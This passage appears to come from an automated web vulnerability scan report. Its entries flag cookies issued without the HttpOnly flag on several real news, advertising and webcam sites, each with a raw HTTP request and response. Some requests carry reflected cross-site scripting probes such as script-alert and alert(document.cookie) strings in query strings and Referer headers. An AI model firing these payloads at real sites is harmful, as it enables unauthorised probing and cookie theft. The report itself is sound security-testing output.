Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:01:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.318. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1874556783@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2453
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.319. http://dm.de.mookie1.com/2/B3DM/DLX/@x94

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224089

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 666
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

var oas_d=new Dat
...[SNIP]...

11.320. http://es.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vchlbzedqlcfhl45ve5fslub; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=vchlbzedqlcfhl45ve5fslub; path=/; HttpOnly
Set-Cookie: spvdr=vd=8e4ca1d5-377c-48cd-a6db-d82638510b03&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:08 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 18321
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...

11.321. http://es.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5ejgunn2haxg0q55r1tc4d45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=5ejgunn2haxg0q55r1tc4d45; path=/; HttpOnly
Set-Cookie: spvdr=vd=becd25c8-0c61-48da-969d-8a73ed263b7e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:10 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pes=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:17:10 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:10 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


11.322. http://events.cbs6albany.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 43
ETag: "3438eef8566da91c0a816f482d081bc2"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT
Set-Cookie: zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; path=/; expires=Sat, 28-Jan-2012 17:37:18 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Thu, 28-Apr-2011 17:37:18 GMT; HttpOnly
Content-Length: 50101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...

11.323. http://fr.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=biwlqs45r3p1b2nlyi4uyly4; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=biwlqs45r3p1b2nlyi4uyly4; path=/; HttpOnly
Set-Cookie: spvdr=vd=49cda1d5-e336-4ec8-bd41-d08c0704718a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:18 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:17 GMT
Connection: close
Content-Length: 18534
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...

11.324. http://fr.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=brffclf15q0uso45xmkvbd45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=brffclf15q0uso45xmkvbd45; path=/; HttpOnly
Set-Cookie: spvdr=vd=95c03f16-e842-40fb-9f26-d7997999e33d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pfr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:19 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.325. http://gr.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=qarha0jvy2pajv55jux4d3jl; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=qarha0jvy2pajv55jux4d3jl; path=/; HttpOnly
Set-Cookie: spvdr=vd=acc31a9c-64aa-4483-a09d-06f887e53a48&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:21 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:20 GMT
Connection: close
Content-Length: 20472
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...

11.326. http://gr.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fuifju55vr33or45jnecwi55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fuifju55vr33or45jnecwi55; path=/; HttpOnly
Set-Cookie: spvdr=vd=b6d62c3b-9b3a-4c2d-a769-ff605e4db3de&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:23 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pgr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:23 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.327. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...

11.328. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:19 GMT
Content-Length: 32594
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...

11.329. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html?CN=AP707&valid=NO&set=new&view=quote&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html;charset=utf-8
Expires: Sat, 29 Jan 2011 04:49:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:22 GMT
Content-Length: 26005
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...

11.330. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE HTTP/1.1
Host: hosted.ap.org
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/javascript
Vary: Accept-Encoding
Expires: Fri, 28 Jan 2011 21:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 21:57:28 GMT
Connection: close
Content-Length: 8304

document.write( '<!--GLOBAL FALSE FOR PROXY-PARTIAL-->');
document.write( '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">');
...[SNIP]...

11.331. http://hosted.ap.org/lineups/NEWSBRIEF-bulleted.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /lineups/NEWSBRIEF-bulleted.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lineups/NEWSBRIEF-bulleted.js?SITE=MAPIT&SECTION=HOME HTTP/1.1
Host: hosted.ap.org
Proxy-Connection: keep-alive
Referer: http://www.berkshireeagle.com/?f0ba9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e6d2fe4b4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MAPIT; Path=/
Set-Cookie: SECTION=HOME; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=61
Date: Sat, 29 Jan 2011 13:40:14 GMT
Connection: close
Content-Length: 2200

document.write( '<li class="ap-bulleted-headline-2"><a href="http://hosted.ap.org/dynamic/stories/M/ML_EGYPT_PROTEST?SITE=MAPIT&SECTION=HOME&TEMPLATE=DEFAULT">Massive demonstration swells in downtown
...[SNIP]...

11.332. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 16:46:03 GMT
Connection: close
Set-Cookie: c=201003Jhk3Ji23Jhj0000-N81mUzJ_0VX17742830124_358090_2FX10137980545300003K99;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:03 GMT;Path=/servlet/ajrotator/track/pt63693


11.333. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63722/0/vj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /servlet/ajrotator/63722/0/vj?ajecscp=1296224075221&z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
